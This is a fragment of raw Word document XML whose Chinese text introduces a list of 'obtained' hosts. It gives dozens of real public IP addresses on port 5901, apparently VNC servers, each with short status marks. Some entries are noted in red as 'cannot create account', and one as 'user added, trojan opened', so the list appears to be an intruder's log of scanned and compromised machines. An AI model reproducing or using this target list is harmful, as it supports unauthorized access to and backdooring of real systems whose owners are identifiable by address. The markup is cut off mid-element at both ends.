      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>得到的没有界面的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">58.16.50.148:5901    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fffff</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">58.16.50.149:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">58.16.50.150:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">120.197.85.134:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ffff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">36.250.90.5:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">36.250.90.8:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">36.250.90.4:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ffff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">36.250.90.3:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ffff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">36.250.90.6:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ffff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">175.6.2.91:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ffff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">175.6.2.199:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">175.6.2.197:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ffff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">175.6.2.195:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ffff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">175.6.2.198:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ffff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">175.6.2.196:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ffff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">58.68.231.165:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.160.250.9:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ffff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.172.251.195:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ffff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.184.203.136:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ffff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.191.188.212:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ffff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">66.171.241.213:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">66.171.241.225:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fff</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">103.23.144.194:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">112.137.167.186:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ffff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">113.128.198.138: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r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">115.238.31.173:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ffff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">117.34.78.213:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ffff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">117.103.97.219:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ffff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">117.103.97.166:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ffff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">117.103.97.167:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ffff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">117.103.97.215:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ffff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">117.103.97.207:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ffff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">117.103.97.185:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ffff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>117.103.97.174:5901</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ffff</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">117.103.97.189:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">117.103.97.191:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ffff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">117.103.101.65:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ffff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">117.103.97.217:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ffff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">112.137.167.186:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ffff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">117.103.97.180:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ffff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">118.122.165.33:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">118.123.173.91:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ffff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">118.123.255.136:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ffff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">118.195.132.173:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ffff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">118.244.211.9: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118.244.211.7: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118.244.211.8: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119.147.156.152:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ffff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">121.12.120.72:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ffff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">121.14.199.248:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ffff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">122.224.223.231:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">122.228.196.106:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ffff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">124.127.117.234:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ffff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">124.202.141.66:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">125.90.192.4:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>无法创建账号</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">157.159.232.56:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">175.6.2.91:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>w</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">175.6.0.131:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>w</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">175.6.2.199:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">175.6.2.197:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">175.6.2.195:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">175.6.2.198:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">175.6.2.196:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">175.41.2.6:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fffff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">175.41.7.8:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ffff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">175.41.13.20:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ffff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">175.41.7.7:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ffff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">175.41.15.7:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ffff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">175.41.15.8:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fffff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">175.41.0.73:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ffff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">180.168.34.246:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ffff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>183.60.175.44:5901</w:t>
      </w:r>
      <w:r w:rsidRPr="00654E9C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">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202.43.35.209:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.149.85.230:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>f\f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">203.144.227.236:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">210.51.165.41:5901 </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD1653">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>已加用户已开马</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">211.156.177.8:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">218.24.71.101:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.28.153.41:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.28.153.37:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.93.127.140: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219.141.213.79:5901</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB3C93">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">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219.141.213.78:5901</w:t>
      </w:r>
      <w:r w:rsidRPr="00293D41">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">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220.112.203.143:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">220.112.203.145:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">220.112.205.235:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>220.112.205.243:5901</w:t>
      </w:r>
      <w:r w:rsidRPr="00293D41">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">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220.112.205.245:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">220.112.205.225:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">220.112.205.244:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">220.231.142.92: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36.248.0.7:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">36.248.0.10:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
